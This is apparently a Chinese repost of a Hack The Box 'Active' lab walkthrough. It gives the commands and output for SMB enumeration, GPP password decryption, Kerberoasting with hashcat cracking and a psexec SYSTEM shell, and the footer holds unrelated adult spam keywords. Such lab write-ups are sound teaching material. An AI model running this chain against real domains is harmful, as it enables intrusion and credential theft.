活動目錄下的常見攻擊方式 - 知識

Active是一個很簡單的box，不過也提供了很多學習的機會。這個box包含了很多與Windows活動目錄相關的常見漏洞。你可以在這個box中進行SMB枚舉，這是一個不錯的練習機會。你也可以對Windows域使用kerberoasting，但如果你不是滲透測試員的話，是沒有機會這么做的。

Box詳情

偵察

Nmap
SMB

-SMB枚舉

-列出共享

共享復制-SMB

遍歷
GPP密碼
破解GPP密碼

用戶共享-SMB

Kerberoasting

背景
獲取哈希
使用Hashcat破解

管理員權限

共享遍歷
獲取root.txt
System shell

Box詳情：

偵察

Nmap

Nmap結果顯示這是一臺Windows 2008 R2服務器，而且是活動目錄域控。

root@kali:~/hackthebox/active-10.10.10.100# nmap -sT -p- --min-rate 5000 -oA nmap/alltcp 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 21:35 EDT
Nmap scan report for 10.10.10.100
Host is up (0.020s latency).
Not shown: 65512 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49169/tcp open unknown
49170/tcp open unknown
49179/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 13.98 seconds
root@kali:~/hackthebox/active-10.10.10.100# nmap -sV -sC -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152-49158,49169,49170,49179 --min-rate 5
000 -oA nmap/scripts 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 21:37 EDT
Nmap scan report for 10.10.10.100
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7600 (1DB04001) (Windows Server 2008 R2)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7600 (1DB04001)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2018-07-29 01:37:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp closed unknown
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49179/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -35s, deviation: 0s, median: -35s
|_nbstat: NetBIOS name: DC, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:a2:16:8b (VMware)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2018-07-28 21:38:11
|_ start_date: 2018-07-28 15:00:50
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.56 seconds
root@kali:~/hackthebox/active-10.10.10.100# nmap -sU -p- --min-rate 5000 -oA nmap/alludp 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 21:40 EDT
Warning: 10.10.10.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.100
Host is up (0.021s latency).
Not shown: 65385 open|filtered ports, 145 closed ports
PORT STATE SERVICE
123/udp open ntp
137/udp open netbios-ns
49413/udp open unknown
49616/udp open unknown
65096/udp open unknown

SMB-TCP 139/445

SMB遍歷

如果是一臺Windows主機，那么我會看看SMB。一般我都會使用多種工具來對主機進行SMB遍歷。我還寫了一篇博客，講解各種SMB遍歷的工具。然后lppsec又告訴我一個工具smbmap，那會兒我剛寫完那篇博客，剛剛更新完SMB枚舉checklist，不過我又去編輯那篇博客，添加了smbmap這個工具的使用原理和使用步驟。

列出共享

我剛開始使用enum4linux這個工具進行了枚舉，但是這個工具有個問題，它dump了一堆信息，不過大多時候，這些信息都沒什么用。返回來的信息都很難理解，下面是輸出結果中比較有用的部分：

root@kali:/opt/ad-ldap-enum# enum4linux -a 10.10.10.100
...[snip]...
=========================================
| Share Enumeration on 10.10.10.100 |
=========================================
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.100
//10.10.10.100/ADMIN$ Mapping: DENIED, Listing: N/A
//10.10.10.100/C$ Mapping: DENIED, Listing: N/A
//10.10.10.100/IPC$ Mapping: OK Listing: DENIED
//10.10.10.100/NETLOGON Mapping: DENIED, Listing: N/A
//10.10.10.100/Replication Mapping: OK, Listing: OK
//10.10.10.100/SYSVOL Mapping: DENIED, Listing: N/A
//10.10.10.100/Users Mapping: DENIED, Listing: N/A
...[snip]...

而smbmap工具的輸出結果就非常清楚，一目了然，如圖所示，還顯示了我們不經認證就有Replication Share的讀取權限

root@kali:~/hackthebox/active-10.10.10.100# smbmap -H 10.10.10.100
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.100...
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON NO ACCESS
Replication READ ONLY
SYSVOL NO ACCESS
Users NO ACCESS

Replication share –SMB

枚舉

因為我可以不用密碼就直接訪問\\10.10.10.100\Replication，我將使用smbclient來連接并查看一番。

root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/Replication -U ""%""
Try "help" to get a list of possible commands.
smb: \>

或者，我也可以使用smbmap來遞歸列出share中的所有文件，命令如下：

smbmap -H 10.10.10.100 -R

哪種方法都行，我注意到了一個很有意思的文件Groups.xml，內容如下：

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018

它有username和cpassword字段：

<?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User></Groups>

GPP密碼

只要創建了一個新的GPP(組策略首選項)，都會在SYSVOL share中創建一個數據配置的xml文件，包括任何與GPP相關的密碼。不過，為了安全起見，在存儲之前，Microsoft AES對密碼進行了加密處理。但是，Microsoft又在MSDN上發布了秘鑰。

微軟在2014年發布了一個補丁，防止管理員將密碼寫入GPP。但是這個補丁對于那些已存在的可破解的密碼不起任何作用。而且據我所知，滲透測試員在2018年也經常能夠發現這些秘鑰。更多詳情，請看這篇博客：AD security。

破解GPP密碼

既然得到了秘鑰，我們就可以進行破解了。Kali上有一個工具gpp-decrypt可以破解：

root@kali:~/hackthebox/active-10.10.10.100/smb-loot# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

用戶共享-SMB

有了用戶名和密碼，我又能多訪問3個share了。

root@kali:~/hackthebox/active-10.10.10.100/smb-loot# smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.100...
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON READ ONLY
Replication READ ONLY
SYSVOL READ ONLY
Users READ ONLY

當我連接到用戶共享時，看起來有點像是C:\Users\目錄，事實上就是這個目錄：

root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHS 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHS 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 6308502 blocks available

這樣一來，我們就有足夠的權限來訪問user.txt文件了。

smb: \SVC_TGS\desktop\> get user.txt
getting file \SVC_TGS\desktop\user.txt of size 34 as user.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
root@kali:~/hackthebox/active-10.10.10.100# cat user.txt
86d67d8b...

Kerberoasting

背景

Kerberos是Windows活動目錄環境中用于身份認證的協議（當然它也可以用于Linux主機的身份認證）。2014年，Tim Medin演示了對kerberos的攻擊，他把這種攻擊叫做kerberoasting。這個演示非常值得一看，因為Tim用了圖文并茂的方式闡述了攻擊過程。這里我會嘗試簡單回顧一下。

如果你要使用Kerberos對某些服務進行身份驗證，你需要聯系DC并告訴它要對哪個系統服務進行身份驗證。它會使用服務用戶的密碼哈希對response進行加密然后返回給你。你再把該response發送給服務，該服務可以使用密碼對其進行解密，檢查你的身份，并確定是否允許你進入。

在Kerberoasting攻擊中，你不會將encrypted ticket從DC發送到服務，而是使用離線暴力來破解與服務相關的密碼。

獲取哈希

我將使用IMpacket工具中的GetUserSPNs.py腳本來獲取與普通用戶帳戶關聯的服務用戶名列表。它也會得到一個我可以破解的ticket。

該腳本跑完之后識別出了一個用戶，而且是管理員：

root@kali:~/hackthebox/active-10.10.10.100# GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40 2018-07-21 11:05:53

它也返回了一個ticket，我就可以嘗試暴力破解來得到用戶的密碼：

root@kali:~/hackthebox/active-10.10.10.100# cat GetUserSPNs.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f37607953ce9fd6c9060de4aece5$55e2d21e37623a43d8cd5e36e39bfaffc52abead3887ca728d527874107ca042e0e9283ac478b1c91cab58c9184828e7a5e0af452ad2503e463ad2088ba97964f65ac10959a3826a7f99d2d41e2a35c5a2c47392f160d65451156893242004cb6e3052854a9990bac4deb104f838f3e50eca3ba770fbed089e1c91c513b7c98149af2f9a994655f5f13559e0acb003519ce89fa32a1dd1c8c7a24636c48a5c948317feb38abe54f875ffe259b6b25a63007798174e564f0d6a09479de92e6ed98f0887e19b1069b30e2ed8005bb8601faf4e476672865310c6a0ea0bea1ae10caff51715aea15a38fb2c1461310d99d6916445d7254f232e78cf9288231e436ab457929f50e6d4f70cbfcfd2251272961ff422c3928b0d702dcb31edeafd856334b64f74bbe486241d752e4cf2f6160b718b87aa7c7161e95fab757005e5c80254a71d8615f4e89b0f4bd51575cc370e881a570f6e5b71dd14f50b8fd574a04978039e6f32d108fb4207d5540b4e58df5b8a0a9e36ec2d7fc1150bb41eb9244d96aaefb36055ebcdf435a42d937dd86b179034754d2ac4db28a177297eaeeb86c229d0f121cf04b0ce32f63dbaa0bc5eafd47bb97c7b3a14980597a9cb2d83ce7c40e1b864c3b3a77539dd78ad41aceb950a421a707269f5ac25b27d5a6b7f334d37acc7532451b55ded3fb46a4571ac27fc36cfad031675a85e0055d31ed154d1f273e18be7f7bc0c810f27e9e7951ccc48d976f7fa66309355422124ce6fda42f9df406563bc4c20d9005ba0ea93fac71891132113a15482f3d952d54f22840b7a0a6000c8e8137e04a898a4fd1d87739bf5428d748086f0166b35c181729cc62b41ba6a9157333bb77c9e03dc9ac23782cf5dcebd11faad8ca3e3e74e25f21dc04ba9f1703bd51d100051c8f505cc8085056b94e349b57906ee8deaf026b3daa89e7c3fc747a6a31ae08376da259f3118370bef86b6e7c2f88d66400eccb122dec8028223f6dcde29ffaa5b83ecb1c3780a782a5797c527a26a7b51b62db3e4865ebc2a0a0d2c931550decb3e7ae581b59f070dd33e423a90ec2ef66982a1b6336afe968fa93f5dd2880a313dc05d4e5cf104b6d9a8316b9fe3dc16e057e0f5c835e111ab92795fb0033541916a57df8f8e6b8cc25ecff2775282ccee110c49376c2cec6b7bb95c265f1466994da89e69605594ead28d24212a137ee20197d8aa95f243c347e02616f40f4071c33f749f5b94d1259fd32174

使用Hashcat破解

我會在這個網址查找哈希類型，然后使用Hashcat進行破解：

~/Dropbox/CTFs/hackthebox/active-10.10.10.100$ hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force
hashcat (v4.0.1) starting...
...snip...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f37607953ce9fd6c9060de4aece5$55e2d21e37623a43d8cd5e36e39bfaffc52abead3887ca728d527874107ca042e0e9283ac478b1c91cab58c9
184828e7a5e0af452ad2503e463ad2088ba97964f65ac10959a3826a7f99d2d41e2a35c5a2c47392f160d65451156893242004cb6e3052854a9990bac4deb104f838f3e50eca3ba770fbed089e1c91c513b7c98149af2f9a
994655f5f13559e0acb003519ce89fa32a1dd1c8c7a24636c48a5c948317feb38abe54f875ffe259b6b25a63007798174e564f0d6a09479de92e6ed98f0887e19b1069b30e2ed8005bb8601faf4e476672865310c6a0ea0b
ea1ae10caff51715aea15a38fb2c1461310d99d6916445d7254f232e78cf9288231e436ab457929f50e6d4f70cbfcfd2251272961ff422c3928b0d702dcb31edeafd856334b64f74bbe486241d752e4cf2f6160b718b87aa
7c7161e95fab757005e5c80254a71d8615f4e89b0f4bd51575cc370e881a570f6e5b71dd14f50b8fd574a04978039e6f32d108fb4207d5540b4e58df5b8a0a9e36ec2d7fc1150bb41eb9244d96aaefb36055ebcdf435a42d
937dd86b179034754d2ac4db28a177297eaeeb86c229d0f121cf04b0ce32f63dbaa0bc5eafd47bb97c7b3a14980597a9cb2d83ce7c40e1b864c3b3a77539dd78ad41aceb950a421a707269f5ac25b27d5a6b7f334d37acc7
532451b55ded3fb46a4571ac27fc36cfad031675a85e0055d31ed154d1f273e18be7f7bc0c810f27e9e7951ccc48d976f7fa66309355422124ce6fda42f9df406563bc4c20d9005ba0ea93fac71891132113a15482f3d952
d54f22840b7a0a6000c8e8137e04a898a4fd1d87739bf5428d748086f0166b35c181729cc62b41ba6a9157333bb77c9e03dc9ac23782cf5dcebd11faad8ca3e3e74e25f21dc04ba9f1703bd51d100051c8f505cc8085056b
94e349b57906ee8deaf026b3daa89e7c3fc747a6a31ae08376da259f3118370bef86b6e7c2f88d66400eccb122dec8028223f6dcde29ffaa5b83ecb1c3780a782a5797c527a26a7b51b62db3e4865ebc2a0a0d2c931550de
cb3e7ae581b59f070dd33e423a90ec2ef66982a1b6336afe968fa93f5dd2880a313dc05d4e5cf104b6d9a8316b9fe3dc16e057e0f5c835e111ab92795fb0033541916a57df8f8e6b8cc25ecff2775282ccee110c49376c2c
ec6b7bb95c265f1466994da89e69605594ead28d24212a137ee20197d8aa95f243c347e02616f40f4071c33f749f5b94d1259fd32174:Ticketmaster1968

管理員權限

Share枚舉

現在，有了管理員的密碼，我們幾乎可以訪問所有的shares，包括C$，這會提供整個文件系統：

root@kali:~/hackthebox/active-10.10.10.100/smb-loot# smbmap -H 10.10.10.100 -d active.htb -u administrator -p Ticketmaster1968
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.100...
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
---- -----------
ADMIN$ READ, WRITE
C$ READ, WRITE
IPC$ NO ACCESS
NETLOGON READ, WRITE
Replication READ ONLY
SYSVOL READ, WRITE
[!] Unable to remove test directory at \\10.10.10.100\SYSVOL\vnCfhEJMWA, plreae remove manually
Users READ ONLY

獲取root.txt

我可以使用smbclient或者smbmap來進行連接并獲取root.txt文件：

root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/C$ -U active.htb\\administrator%Ticketmaster1968
Try "help" to get a list of possible commands.
smb: \> get \users\administrator\desktop\root.txt
getting file \users\administrator\desktop\root.txt of size 34 as \users\administrator\desktop\root.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
root@kali:~/hackthebox/active-10.10.10.100# cat root.txt
b5fc76d1...

這里值得注意的是，我甚至沒有獲取系統的shell就拿到了系統中的root flag。

System shell

但我當然想getshell。現在這些shares是可寫的，而且我有管理員權限，我可以使用PSExec來getshell。直接在kali上就有很多方法進行提權，這里我還是使用Impacket這個工具，使用psexec.py這個腳本：

root@kali:~/hackthebox/active-10.10.10.100# psexec.py active.htb/administrator@10.10.10.100
Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file dMCaaHzA.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service aYMa on 10.10.10.100.....
[*] Starting service aYMa.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
C:\Windows\system32>whoami
nt authority\system

亚洲成精品动漫久久精久,九九在线精品视频播放,黄色成人免费观看,三级成人影院,久碰久,四虎成人欧美精品在永久在线

活動目錄下的常見攻擊方式
2019-01-13 4hou

延伸閱讀

熱文

亚洲成精品动漫久久精久,九九在线精品视频播放,黄色成人免费观看,三级成人影院,久碰久,四虎成人欧美精品在永久在线

活動目錄下的常見攻擊方式 2019-01-13 4hou

延伸閱讀

熱文

活動目錄下的常見攻擊方式
2019-01-13 4hou